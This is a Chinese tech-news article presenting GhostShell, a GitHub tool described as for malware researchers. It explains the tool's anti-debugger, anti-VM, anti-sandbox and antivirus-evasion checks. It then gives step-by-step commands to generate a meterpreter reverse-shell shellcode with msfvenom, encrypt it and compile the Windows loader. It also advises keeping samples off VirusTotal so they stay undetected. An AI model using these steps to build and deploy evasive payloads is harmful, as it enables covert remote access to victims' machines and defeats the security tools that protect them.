GhostShell:一款带有AV绕过和反分析技术的恶意软件研究工具

Linux领域 > Linux 文章作者:fakers 2020-06-27 13:11 阅读: loading...

GhostShell是一款专为恶意软件研究人员设计的工具,首先它是无法被检测到的,自带有反病毒产品绕过技术,并且无法进行反汇编分析。同时在这个恶意软件中,它还使用了某些技术来绕过反病毒产品、虚拟机和沙箱环境。

Malware.jpg

 注意事项

为了保证反病毒产品无法检测到GhostShell,请不要将生成的样本发送至VirusTotal。如果想要检测GhostShell,可以将其发送至https://www.hybrid-analysis.com/,别忘了勾选“Do not send my sample to non-affiliated third parties”选项(不要将我的样本发送给第三方厂商)。

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地,然后进行代码编译:

git clone https://github.com/ReddyyZ/GhostShell.git

绕过技术

反调试器

为了尝试绕过调试器的分析,GhostShell在这里使用了Windows.h库中的IsDebuggerPresent()方法来判断当前是否有代码调试器正在运行。

反虚拟机/反沙箱环境/反AV

1、 进程枚举功能

GhostShell可以枚举出当前操作系统中所有正在运行的进程,然后将进程列表与黑名单中的进程名称进行对比,如果找到了匹配的进程,则返回识别标识符“-1”。

2、 休眠加速检测功能

首先,GhostShell会尝试获取当前时间,然后休眠两分钟。接下来,并再次尝试获取时间,然后进行对比。如果时间差小于2,则返回识别标识符“-1”。

3、 MAC地址检测功能

获取系统MAC地址,并与黑名单中的MAC地址进行比对,如果检测到了匹配项,则返回识别标识符“-1”。

生成ShellCode 

如需生成ShellCode,你需要在命令行终端窗口中输入下列命令:

msfvenom -p windows/meterpreter/reverse_shell lhost=(IP) lport=(PORT) -f c

接下来,你需要拷贝生成的ShellCode,然后对其进行加密处理。

在加密时,你需要使用encrypt_shellcode脚本。

在Linux平台上,请运行下列命令:

./encrypt_shellcode e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(shellcode)""

在Windows平台上,请运行下列命令:

encrypt_shellcode.exe e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(YOUR_SHELLCODE)""

如何在Linux编译Windows端恶意软件

如果你需要在Linux系统中编译适用于Windows平台的GhostShell程序,首先你需要运行下列命令安装mingw-w64:

sudo apt-get install mingw-w64

接下来,运行下列命令编译32位代码:

i686-w64-mingw32-gcc -o main.exe main.c -l psapi –static

或者,你也可以运行下列命令编译64位源码:

x86_64-w64-mingw32 -o main.exe main.c -l psapi -static

许可证协议

GhostShell项目的开发与发布遵循MIT开源许可证协议

项目地址

GhostShell:【GitHub传送门

参考来源

ReddyyZ

评论 点击评论